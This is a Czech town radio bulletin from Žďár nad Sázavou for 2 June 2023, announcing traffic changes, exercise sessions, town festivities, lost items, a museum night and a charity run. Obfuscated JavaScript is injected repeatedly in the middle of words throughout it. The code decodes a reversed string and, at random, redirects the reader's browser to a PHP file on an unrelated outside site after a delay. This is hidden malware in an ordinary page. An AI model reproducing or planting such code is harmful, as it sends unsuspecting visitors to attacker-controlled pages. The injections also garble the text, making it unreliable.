Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 2. června 2023

Pátek, 2. června 2023

Z ÚŘADU:

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou informuje o zavedení nových dopravních opatření. Od 1. června 2023 platí na Švermově ulici systém „školní ulice“. Ve dnech školního vyučování mezi 7:15 a 8:00 hodin nebude možné zajet od kostela Nejsvětější Trojice dál. 

Dále od pondělí 5. června 2023 vchází v platnost jednosměrky na Okružní horní, Hálkové a Drdlové. Více informací najdete na webu města a na Facebooku.

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou pořádá v rámci projektu Aktivně pro Žďár letní cvičení na Farčatech. Začínáme 3. června 2023. Program nabízí tancování s Džamilou, cvičení se Zuzkou a jógu s Idou, Janou a Radkou. Nově je v nabídce i cvičení pro rodiče s dětmi od 2 let. Přesné termíny a další informace najdete na Facebooku a webu města.

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou zve všechny Žďáráky na Den Žďáru 2023, který proběhne v sobotu 10. června 2023. Program bude na Farských humnech a v okolí Tvrze, kde budou probíhat koncerty, taneční, folklorní i divadelní vys$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toupení. Hlavní hvězdou bude kapela Poletíme!. Doprovodné programy proběhnou v knihovně, v muzeu na Tvrzi nebo v Modelovém království. Podrobný program najdete na Facebooku a webu města. 

ZTRÁTY A NÁLEZY:

Městský úřad, odbor finanční oznamuje, že na ztráty a nálezy byly předány mobilní telefon a penál + psací potřeby. Seznam všech nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři, 1. patro, dveře č. 35 – ztráty a nálezy. 

 

KULTURNÍ POZVÁNKY:

Regionální muzeum Žďár zve všechny na Muzejní noc, a $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to v pátek 9. června 2023 od 19:00 hodin do půlnoci. Muzejní noc na téma Kouzlo objevování: Od hieroglyfů k Tutanchamonovi začne v 19:00 hodin před tvrzí a zahrnuje osm poučných i zábavných zastavení, vys$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toupení dívčího pěveckého tria Arabeska z Polska a koncert kapely Čankišou. Po dobu konání akce bude uzavřeno Havlíčkovo náměstí. Přijďte si užít večer u dobrého jídla a pití. Více informací najdete na webu www.muzeumzdar.cz nebo na Facebooku města.

V Regionálním muzeu na Tvrzi probíhá do 27. srpna 2023 výstava Kouzlo objevování: Od hieroglyfů k Tutanchamonovi. Návštěvníci se seznámí s životem starých Egypťanů, proniknou do tajů egyptských hieroglyfů a doslova se ocitnou v hrobce faraona Tutanchamona. Více informací najdete na webu www.muzeumzdar.cz nebo na Facebooku.

V Čechově domě je umístěna expozice obrazů Lenky Majorové – „Plňte si své sny... kdy jindy, když ne teď“. Výstava je ke zhlédnutí do konce června 2023.

Žďárská jednota Orel pořádá již 14. ročník spor$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovní nezávodní akce s názvem Pohybem k naději, která je spojena s finanční sbírkou ve prospěch Nadačního fondu dětské onkologie Krtek Brno. Akce se koná dnes 2. června 2023 odpoledne na prostranství za žďárským Domem kultury. Registrace účastníků začne v 15:00 hodin a samotný start je naplánovaný na 16:00 hodinu. Trasa bude kopírovat cyklostezku proti proudu řeky Sázavy a terénní běžecká cesta povede úvozem k soše Mamlase a zpět. Trať můžete zdolat jako běžci, cyklisté či chodci. Připraven je zajímavý doprovodný program, upomínkové předměty i věcné ceny. Akci podpořilo Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou. Aktuality a podrobnosti najdete na webových stránkách www.pohybemknadeji.cz  

KONEC